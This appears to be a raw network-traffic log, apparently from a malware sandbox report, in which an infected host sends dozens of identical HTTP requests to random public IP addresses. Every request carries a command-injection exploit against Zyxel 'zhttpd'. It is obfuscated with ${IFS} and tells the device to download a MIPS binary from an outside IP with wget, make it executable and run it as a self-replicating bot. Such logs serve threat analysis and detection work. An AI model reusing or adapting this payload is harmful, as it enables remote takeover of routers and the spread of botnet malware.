                                                        Feb 2, 2024 06:21:17.066174030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6086192.168.2.1458306114.80.34.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066199064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6087192.168.2.145065660.70.212.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066239119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6088192.168.2.1449490104.198.217.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066293001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6089192.168.2.1439012176.96.25.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066313028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6090192.168.2.1442622179.6.215.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066361904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6091192.168.2.145274840.221.216.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066384077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6092192.168.2.144905253.24.47.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066450119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6093192.168.2.1459596131.151.254.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066490889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6094192.168.2.145677038.23.13.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066535950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6095192.168.2.1439214187.167.78.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066566944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6096192.168.2.1441722166.73.3.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066603899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6097192.168.2.1439992116.12.24.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066641092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6098192.168.2.144251814.49.51.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066689968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6099192.168.2.1456882171.135.116.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066729069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6100192.168.2.144413218.122.248.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066766024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6101192.168.2.143674641.210.134.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066808939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6102192.168.2.1434188100.213.182.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066850901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6103192.168.2.1446522219.160.175.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066895962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6104192.168.2.143590844.17.145.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066930056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6105192.168.2.1443138182.15.227.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.066982985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6106192.168.2.1449684205.48.154.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067039013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6107192.168.2.1437972104.191.229.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067053080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6108192.168.2.1460374194.23.208.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067107916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6109192.168.2.143654458.231.129.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067131042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6110192.168.2.146026847.93.130.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067181110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6111192.168.2.145552227.222.216.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067230940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6112192.168.2.1434632124.8.78.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067246914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6113192.168.2.145651849.154.133.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067295074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6114192.168.2.1453142201.54.255.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067327023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6115192.168.2.143293295.192.112.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067363977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6116192.168.2.1456896105.171.73.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067405939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6117192.168.2.144194092.226.182.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067450047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6118192.168.2.1453582219.87.46.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067476988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6119192.168.2.1455708171.228.94.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067512035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6120192.168.2.1445892206.82.102.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067559004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6121192.168.2.144446240.209.188.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067599058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6122192.168.2.143569417.26.10.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067651987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6123192.168.2.1441800208.48.67.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067672968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6124192.168.2.144500074.250.156.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067732096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6125192.168.2.144441670.92.50.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067790031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6126192.168.2.1452680118.177.107.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067816019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6127192.168.2.1454284117.12.95.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067872047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6128192.168.2.143773439.32.83.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067910910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6129192.168.2.1445786193.218.22.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067939997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6130192.168.2.145523272.4.110.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.067984104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6131192.168.2.1446826194.168.59.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068006039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6132192.168.2.143631673.174.96.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068039894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6133192.168.2.1444466187.148.3.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068079948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6134192.168.2.144694458.118.255.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068139076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6135192.168.2.145875614.100.146.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068166971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6136192.168.2.144788485.105.175.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068218946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6137192.168.2.1445498178.195.211.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068248987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6138192.168.2.1437000126.137.140.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068298101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6139192.168.2.143839442.180.181.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068341017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6140192.168.2.1442702155.241.5.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068393946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6141192.168.2.1440858121.232.203.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068428040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6142192.168.2.1437568218.180.38.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068485975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6143192.168.2.14494465.134.113.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068512917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6144192.168.2.1460892113.9.36.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068547964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6145192.168.2.144678470.112.0.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068584919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6146192.168.2.1451920187.129.62.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068633080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6147192.168.2.1459854189.52.58.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:17.068659067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6148192.168.2.1455348130.183.249.165443
                                                        TimestampBytes transferredDirectionData
